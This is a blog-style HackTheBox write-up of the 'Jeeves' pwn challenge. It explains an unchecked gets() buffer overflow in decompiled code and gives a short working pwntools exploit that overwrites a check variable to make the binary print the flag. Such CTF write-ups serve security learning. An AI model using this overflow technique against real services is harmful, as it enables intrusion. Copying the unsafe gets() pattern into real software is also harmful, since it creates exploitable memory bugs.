---
title: HackTheBox - Jeeves Writeup
date: 2021-09-19
categories: ["ctf"]
tags: ["htb", "ctf", "pwn"]
draft: false
type: posts
---

# Getting Started

This challenge is pretty easy but I just thought I'd explain it in a blog post real quick since I started doing some of the HTB pwn challenges.

# Reverse Engineering

The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call.

```
printf("Hello, good sir!\nMay I have your name? ");
gets(input_buffer);
printf("Hello %s, hope you have a good day!\n",input_buffer);
```

If we check in Ghidra, the size of the `input_buffer` is only 44 bytes, but there's no length check, so we can just slam a large value in it.

```
char input_buffer [44];
```

However, there is small check;

```
  if (dead_code == 0x1337bab3) {
    flag_buffer = malloc(0x100);
    flag = open("flag.txt",0);
    read(flag,flag_buffer,0x100);
    printf("Pleased to make your acquaintance. Here\'s a small gift: %s\n",flag_buffer);
    close(flag);
  }
  return 0;
```

As you can see, if we can pass this check, it is going to read the flag into a buffer created by malloc(). However, at the start of the function the variable `dead_code` is actually defined as `dead_code = -0x21523f2d`. Not to worry, we can just replace it with our gets() overflow.

# Exploit

```Python
#!/usr/bin/python3
from pwn import *

def main():
	p = remote("138.68.155.238", 32483)

	payload  = b'A' * 60
	payload += p32(0x1337BAB3)
	print(payload)

	p.sendline(payload)
	p.interactive()


if __name__ == '__main__':
	main()

```

So here we are going to send 60 As, followed by `0x1337BAB3` in order to pass the check, since we have a buffer overflow via gets() we'll pass the check and the flag will get printed, easy.